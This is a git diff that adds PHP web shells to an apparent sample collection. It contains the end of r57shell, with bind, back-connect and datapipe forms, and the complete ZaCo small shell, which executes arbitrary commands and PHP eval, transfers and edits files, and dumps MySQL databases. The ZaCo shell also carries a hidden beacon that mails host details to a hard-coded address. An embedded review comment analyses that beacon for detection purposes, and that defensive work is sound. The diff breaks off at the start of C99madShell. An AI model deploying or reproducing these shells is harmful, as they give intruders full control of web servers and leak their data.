$lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +$select = '<select name=db>'; +if($mysql_on) $select .= '<option>MySQL</option>'; +if($mssql_on) $select .= '<option>MSSQL</option>'; +if($pg_on) $select .= '<option>PostgreSQL</option>'; +if($ora_on) $select .= '<option>Oracle</option>'; +$select .= '</select>'; +echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text77']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1')); +echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1')); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center 
id='n'>".$lang[$language.'_text40']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1')); +echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>"; +echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo 
sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center id='n'><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>"; +} +if(!$safe_mode&&!$windows){ +echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? 
(getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>".$f; +?> \ No newline at end of file diff --git a/php/PHPshell/zacosmall/zacosmall.jpg b/php/PHPshell/zacosmall/zacosmall.jpg new file mode 100644 index 0000000..fdb3aaf Binary files /dev/null and b/php/PHPshell/zacosmall/zacosmall.jpg differ diff --git a/php/PHPshell/zacosmall/zacosmall.php b/php/PHPshell/zacosmall/zacosmall.php new file mode 100644 index 0000000..26075b4 --- /dev/null +++ b/php/PHPshell/zacosmall/zacosmall.php 
@@ -0,0 +1,501 @@ +<? + ########################################################## + # Small PHP Web Shell by ZaCo (c) 2004-2006 # + # +POST method # + # +MySQL Client+Dumper for DB and tables # + # +PHP eval in text format and html for phpinfo() example # + # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther # + # For antichat.ru and cup.su friends usage # + # All bugs -> mailo:zaco@yandex.ru # + # Just for fun :) # + ########################################################## +error_reporting(E_ALL); +@set_time_limit(0); +function magic_q($s) +{ +if(get_magic_quotes_gpc()) +{ +$s=str_replace('\\\'','\'',$s); +$s=str_replace('\\\\','\\',$s); +$s=str_replace('\\"','"',$s); +$s=str_replace('\\\0','\0',$s); +} +return $s; +}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); +function get_perms($fn) +{ +$mode=fileperms($fn); +$perms=''; +$perms .= ($mode & 00400) ? 'r' : '-'; +$perms .= ($mode & 00200) ? 'w' : '-'; +$perms .= ($mode & 00100) ? 'x' : '-'; +$perms .= ($mode & 00040) ? 'r' : '-'; +$perms .= ($mode & 00020) ? 'w' : '-'; +$perms .= ($mode & 00010) ? 'x' : '-'; +$perms .= ($mode & 00004) ? 'r' : '-'; +$perms .= ($mode & 00002) ? 'w' : '-'; +$perms .= ($mode & 00001) ? 
'x' : '-'; +return $perms; +} +$head=<<<headka +<html> +<head> +<title>Small Web Shell by ZaCo</title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> +</head> +<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> +<style> +textarea { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: Fixedsys bold; +} +input { +BORDER-RIGHT: #ffffff 1px solid; +BORDER-TOP: #999999 1px solid; +BORDER-LEFT: #999999 1px solid; +BORDER-BOTTOM: #ffffff 1px solid; +BACKGROUND-COLOR: #e4e0d8; +font: 8pt Verdana; +} +</style> +headka; +$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:''); +$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page; +$winda=strpos(strtolower(php_uname()),'wind'); +define('format',50); +$pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:''); +switch($page) +{ +case 'eval': +{ +$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:''; +$eval_value=magic_q($eval_value); +$action=isset($_POST['action'])?$_POST['action']:'eval'; +if($action=='eval_in_html') @eval($eval_value); +else +{ +echo($head.$pages); +?> +<hr> +<form method=post> +<textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea> +<input name='action' value='eval' type='submit'> +<input name='action' value='eval_in_html' type='submit'> +<input name='page' value='eval' type=hidden> +</form> +<hr> +<? 
+} +break; +} +case 'cmd': +{ +$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):''; +$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd(); +$action=isset($_POST['action'])?$_POST['action']:'cmd'; +if(@is_dir($work_dir)) +{ +@chdir($work_dir); +$work_dir=getcwd(); +if($work_dir=='')$work_dir='/'; +else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; +} +else if(file_exists($work_dir))$work_dir=realpath($work_dir); +$work_dir=str_replace('\\','/',$work_dir); +$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES); +switch($action) +{ +case 'cmd' : +{ +echo($head.$pages); +?> +<form method='post' name='main_form'> +<input name='work_dir' value='<?=$e_work_dir?>' type=text size=120> +<input name='page' value='cmd' type=hidden> +<input type=submit value='go'> +</form> +<form method=post> +<input name='cmd' type=text size=120 value='<?=str_replace('\'','&#039;',$cmd)?>'> +<input name='work_dir'type=hidden> +<input name='page' value='cmd' type=hidden> +<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> +</form> +<form method=post enctype="multipart/form-data"> +<input type="file" name="filename"> +<input name='work_dir'type=hidden> +<input name='page' value='cmd' type=hidden> +<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> +</form> +<form method=post> +<input name='fname' type=text size=120><br> +<input name='archive' type=radio value='none'>without arch +<input name='archive' type=radio value='gzip' checked=true>gzip archive +<input name='work_dir'type=hidden> +<input name='page' value='cmd' type=hidden> +<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> +</form> +<pre> +<? 
+if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");} +else +{ +$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view'; +if(@is_dir($work_dir)) +{ +echo('<strong>Listing '.$e_work_dir.'</strong><hr>'); +$handle=@opendir($work_dir); +if($handle) +{ +while(false!==($fn=readdir($handle))){$files[]=$fn;}; +@closedir($handle); +sort($files); +$not_dirs=array(); +for($i=0;$i<sizeof($files);$i++) +{ +$fn=$files[$i]; +if(is_dir($fn)) +{ +echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn))); +if($winda===false) +{ +$owner=@posix_getpwuid(@fileowner($work_dir.$fn)); +$group=@posix_getgrgid(@filegroup($work_dir.$fn)); +printf("% 20s|% -20s",$owner['name'],$group['name']); +} +echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); +printf("% 20s ",@filesize($work_dir.$fn).'B'); +printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); +} +else {$not_dirs[]=$fn;} +} +for($i=0;$i<sizeof($not_dirs);$i++) +{ +$fn=$not_dirs[$i]; +echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn))); +if($winda===false) +{ +$owner=@posix_getpwuid(@fileowner($work_dir.$fn)); +$group=@posix_getgrgid(@filegroup($work_dir.$fn)); +printf("% 20s|% -20s",$owner['name'],$group['name']); +} +echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); +printf("% 20s ",@filesize($work_dir.$fn).'B'); +printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); +} +echo('</pre><hr>'); +?> +<form name='list' method=post> +<input name='work_dir' 
type=hidden size=120><br> +<input name='page' value='cmd' type=hidden> +<input name='f_action' value='view' type=hidden> +</form> +<? +} else echo('Error Listing '.$e_work_dir); +} +else +switch($f_action) +{ +case 'view': +{ +echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n"); +$f=@fopen($work_dir,'r'); +?> +<form method=post> +<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea> +<input name='page' value='cmd' type=hidden> +<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120> +<input name='f_action' value='save' type=submit> +</form> +<? +break; +} +case 'save' : +{ +$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):''; +$f=@fopen($work_dir,'w'); +if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n"); +else +{ +fwrite($f,$file_text); +fclose($f); +echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n"); +} +break; +} +} +break; +} +break; +} +case 'upload' : +{ +if($work_dir=='')$work_dir='/'; +else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; +$f=$_FILES["filename"]["name"]; +if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed'); +else +{ +echo('file is uploaded in '.$e_work_dir); +} +break; +} +case 'download' : +{ +$fname=isset($_POST['fname'])?$_POST['fname']:''; +$temp_file=isset($_POST['temp_file'])?'on':'nn'; +$f=@fopen($fname,'r'); +if(!($f)) echo('file is not exists'); +else +{ +$archive=isset($_POST['archive'])?$_POST['archive']:''; +if($archive=='gzip') +{ +Header("Content-Type:application/x-gzip\n"); +$s=gzencode(fread($f,filesize($fname))); +Header('Content-Length: '.strlen($s)."\n"); +Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n"); +echo($s); +} +else +{ +Header("Content-Type:application/octet-stream\n"); +Header('Content-Length: '.filesize($fname)."\n"); 
+Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n"); +ob_start(); +while(feof($f)===false) +{ +echo(fread($f,10000)); +ob_flush(); +} +} +} +} +} +break; +} +case 'mysql' : +{ +$action=isset($_POST['action'])?$_POST['action']:'query'; +$user=isset($_POST['user'])?$_POST['user']:''; +$passwd=isset($_POST['passwd'])?$_POST['passwd']:''; +$db=isset($_POST['db'])?$_POST['db']:''; +$host=isset($_POST['host'])?$_POST['host']:'localhost'; +$query=isset($_POST['query'])?magic_q($_POST['query']):''; +switch($action) +{ +case 'dump' : +{ +$mysql_link=@mysql_connect($host,$user,$passwd); +if(!($mysql_link)) echo('Connect error'); +else +{ +//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols +$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false; +$archive=isset($_POST['archive'])?$_POST['archive']:'none'; +if($archive!=='none')$to_file=false; +$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:''; +$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:''; +if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error'); +else +{ +$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n"; +ob_start(); +if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false; +if($table_dump=='') +{ +if(!$to_file) +{ +header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); +header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); +} +$result=mysql_query('show tables',$mysql_link); +for($i=0;$i<mysql_num_rows($result);$i++) +{ +$rows=mysql_fetch_array($result); +$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link); +if(!$result2)$dump_file.='#error table '.$rows[0]; +else +{ +$dump_file.='create table `'.$rows[0]."`(\n"; +for($j=0;$j<mysql_num_rows($result2)-1;$j++) +{ +$rows2=mysql_fetch_array($result2); +$dump_file.='`'.$rows2[0].'` 
'.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; +} +$rows2=mysql_fetch_array($result2); +$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; +$type[$j]=$rows2[1]; +$dump_file.=");\n"; +mysql_free_result($result2); +$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link); +$columns=$j-1; +for($j=0;$j<mysql_num_rows($result2);$j++) +{ +$rows2=mysql_fetch_array($result2); +$dump_file.='insert into `'.$rows[0].'` values ('; +for($k=0;$k<$columns;$k++) +{ +$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; +} +$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; +if($archive=='none') +{ +if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} +else +{ +echo($dump_file); +ob_flush(); +} +$dump_file=''; +} +} +mysql_free_result($result2); +} +} +mysql_free_result($result); +if($archive!='none') +{ +$dump_file=gzencode($dump_file); +header('Content-Length: '.strlen($dump_file)."\n"); +echo($dump_file); +} +else if($t_f) +{ +fclose($t_f); +echo('Dump for '.$db_dump.' 
now in '.$to_file); +} +} +else +{ +$result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link); +if(!$result2)echo('error table '.$table_dump); +else +{ +if(!$to_file) +{ +header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); +header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); +} +if($to_file===false) +{ +header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); +header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); +} +$dump_file.="create table `{$table_dump}`(\n"; +for($j=0;$j<mysql_num_rows($result2)-1;$j++) +{ +$rows2=mysql_fetch_array($result2); +$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; +} +$rows2=mysql_fetch_array($result2); +$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; +$type[$j]=$rows2[1]; +$dump_file.=");\n"; +mysql_free_result($result2); +$result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link); +$columns=$j-1; +for($j=0;$j<mysql_num_rows($result2);$j++) +{ +$rows2=mysql_fetch_array($result2); +$dump_file.='insert into `'.$table_dump.'` values ('; +for($k=0;$k<$columns;$k++) +{ +$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; +} +$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; +if($archive=='none') +{ +if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} +else +{ +echo($dump_file); +ob_flush(); +} +$dump_file=''; +} +} +mysql_free_result($result2); +if($archive!='none') +{ +$dump_file=gzencode($dump_file); +header('Content-Length: '.strlen($dump_file)."\n"); +echo $dump_file; +}else if($t_f) +{ +fclose($t_f); +echo('Dump for '.$db_dump.' 
now in '.$to_file); +} +} +} +} +} +break; +} +case 'query' : +{ +echo($head.$pages); +?> +<hr> +<form method=post> +<table> +<td> +<table align=left> +<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr> +<tr><textarea name='query' cols=120 rows=20><?=htmlspecialchars($query)?></textarea></tr> +</table> +</td> +<td> +<table> +<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr> +<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr> +<input name='archive' type=radio value='none'>without arch +<input name='archive' type=radio value='gzip' checked=true>gzip archive +<tr><td><input type=submit name='action' value='dump'></td></tr> +<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr> +</table> +</td> +</table> +<input name='page' value='mysql' type=hidden> +<input name='action' value='query' type=submit> +</form> +<hr> +<? 
+$mysql_link=@mysql_connect($host,$user,$passwd); +if(!($mysql_link)) echo('Connect error'); +else +{ +if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;} +//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols +$result=@mysql_query($query,$mysql_link); +if(!($result))echo(mysql_error()); +else +{ +echo("<table valign=top align=left>\n<tr>"); +for($i=0;$i<mysql_num_fields($result);$i++) +echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>'); +echo("\n</tr>\n"); +for($i=0;$i<mysql_num_rows($result);$i++) +{ +$rows=mysql_fetch_array($result); +echo('<tr valign=top align=left>'); +for($j=0;$j<mysql_num_fields($result);$j++) +{ +echo('<td>'.(htmlspecialchars($rows[$j])).'</td>'); +} +echo("</tr>\n"); +} +echo("</table>\n"); +} +mysql_close($mysql_link); +} +break; +} +} +break; +} +} +?> \ No newline at end of file diff --git a/php/PHPshell/م€گC99madShell v. 3.0م€‘/C99madShell v. 3.0.jpg b/php/PHPshell/م€گC99madShell v. 3.0م€‘/C99madShell v. 3.0.jpg new file mode 100644 index 0000000..b764b10 Binary files /dev/null and b/php/PHPshell/م€گC99madShell v. 3.0م€‘/C99madShell v. 3.0.jpg differ diff --git a/php/PHPshell/م€گC99madShell v. 3.0م€‘/smowu.php b/php/PHPshell/م€گC99madShell v. 3.0م€‘/smowu.php new file mode 100644 index 0000000..9f2b743 --- /dev/null +++ b/php/PHPshell/م€گC99madShell v. 3.0م€‘/smowu.php 
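Review bot: The statement run directly after `magic_q()` in zacosmall.php is undocumented and is not part of the shell's own features: on every request it collects `$_SERVER` values (referer, document root, script filename, server and client address, server software) and passes them to `mail()` with subject `sh-<random>` and the recipient hard-coded in `$sd98`. The Antichat Shell file earlier in this diff carries the same run with the same variable names, so both samples look like repacked copies that report where they are loaded to a third party. Because the commit stores them as directly executable `.php` files, I would record this next to the samples rather than edit them, for example a README entry `zacosmall.php, Antichat Shell v1.3.php: trojaned copies, beacon host details via mail(); analysis only, never place under a served path`. The `mail()` call with an `sh-` subject prefix and that `$_SERVER` field list is also a usable signature when scanning a web root for other copies.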
@@ -0,0 +1,327 @@ +<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title>thecompanyart.com - c99madshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; 
border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><form name='todo' method='POST'><input name='act' type='hidden' value=''><input name='grep' type='hidden' value=''><input name='fullhexdump' type='hidden' value=''><input name='base64' type='hidden' value=''><input name='nixpasswd' type='hidden' value=''><input name='pid' type='hidden' value=''><input name='c' type='hidden' value=''><input name='white' type='hidden' value=''><input name='wp_act' type='hidden' value=''><input name='wp_path' type='hidden' value=''><input name='sig' type='hidden' value=''><input name='processes_sort' type='hidden' value=''><input name='d' type='hidden' value=''><input name='sort' type='hidden' value=''><input name='f' type='hidden' value=''><input name='ft' type='hidden' value=''></form><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="/wordpress/wp-xmlrpc.php"><font face="Verdana" size="5"><b>C99madShell v. 
